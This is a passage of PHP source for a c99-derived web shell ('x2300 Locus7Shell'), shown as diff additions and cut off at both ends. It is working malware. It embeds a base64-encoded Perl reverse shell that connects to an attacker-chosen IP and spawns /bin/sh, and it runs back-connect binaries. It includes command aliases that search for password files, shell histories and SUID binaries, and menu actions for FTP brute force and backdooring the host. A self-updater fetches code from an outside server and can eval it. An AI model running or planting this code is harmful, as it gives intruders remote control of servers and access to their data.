$p2=which("perl"); + $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + if (file_exists("/tmp/back")) { unlink("/tmp/back"); } +} +} + +if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C")) +{ + if(is_writable(".")){ + cf("backc",$back_connect_c); + ex("chmod 777 backc"); + //$blah = ex("gcc back.c -o backc"); + $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("backc")) { unlink("backc"); } + }else{ + ex("chmod 777 /tmp/backc"); + cf("/tmp/backc",$back_connect_c); + //$blah = ex("gcc -o /tmp/backc /tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &"); + $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport']."."; + //if (file_exists("back.c")) { unlink("back.c"); } + if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function cfb($fname,$text) +{ + $w_file=@fopen($fname,"w") or bberr(); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} + +function err() +{ +$_POST['backcconnmsge']="

    Error: Can't connect!"; +} + +function bberr() +{ +$_POST['backcconnmsge']="

    Error: Can't backdoor host!"; +} + +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +//EoW + + + + + + + + + + + + + + + + +//Start Enumerate function +//function ENUMERATE() + +$hostname_x=php_uname(n); +$itshome = getcwd(); +$itshome = str_replace("/home/","~",$itshome); +$itshome = str_replace("/public_html","/x2300.php",$itshome); +$enumerate = "http://".$hostname_x."/".$itshome.""; + +//End Enumerate function + +//Starting calls +ini_set("max_execution_time",0); +if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} +error_reporting(5); +$adires=""; +@ignore_user_abort(TRUE); +@set_magic_quotes_runtime(0); +$win = strtolower(substr(PHP_OS,0,3)) == "win"; +define("starttime",getmicrotime()); +if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0a beta"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "x2300 Locus7Shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server +$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    Hacked by Garc
    "; +/* If you publish free shell and you wish +add link to your site or any other information, +put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);} +$dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin); +if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;} +$dizin = str_replace("\\\\","\\",$dizin); +$dizinispd = htmlspecialchars($dizin); +/*dizin*/ +$real = realpath($dizinispd); +$path = basename ($PHP_SELF); +function dosyayicek($link,$file) +{ + $fp = @fopen($link,"r"); + while(!feof($fp)) + { + $cont.= fread($fp,1024); + } + fclose($fp); + + $fp2 = @fopen($file,"w"); + fwrite($fp2,$cont); + fclose($fp2); +} + + + + +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: +0 - files and folders (as default), +1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8;// lines in hex preview file +$hexdump_rows = 24;// 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("
    [Enumerate]",$enumerate), + array("[Encoder]",$surl."act=encoder&d=%d"), + array("[Tools]",$surl."act=tools&d=%d"), + array("[Proc.]",$surl."act=processes&d=%d"), + array("[FTP Brute]",$surl."act=ftpquickbrute&d=%d"), + array("[Sec.]",$surl."act=security&d=%d"), + array("[SQL]",$surl."act=sql&d=%d"), + array("[PHP-Code]",$surl."act=eval&d=%d"), + array("[Backdoor Host]",$surl."act=shbd"), + array("[Back-Connection]",$surl."act=backc"), + array("[milw0rm it!]",$millink), + array("[PHP-Proxy]",$phprox), + array("[Self remove]
    ",$surl."act=selfremove") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/Next code isn't for editing\/ +/*function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +}*/ +/*function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} + +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or err(0); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +}*/ +/*function err($n,$txt='') +{ +echo '
    '; +echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; +if(!empty($txt)) { echo " $txt"; } +echo '
    '; +return null; +}*/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("x2300 Shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); + +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = TRUE) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by Locous7Shell.SQL v. ".$shver." +# Home page: http://www.Locus7s.com +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and 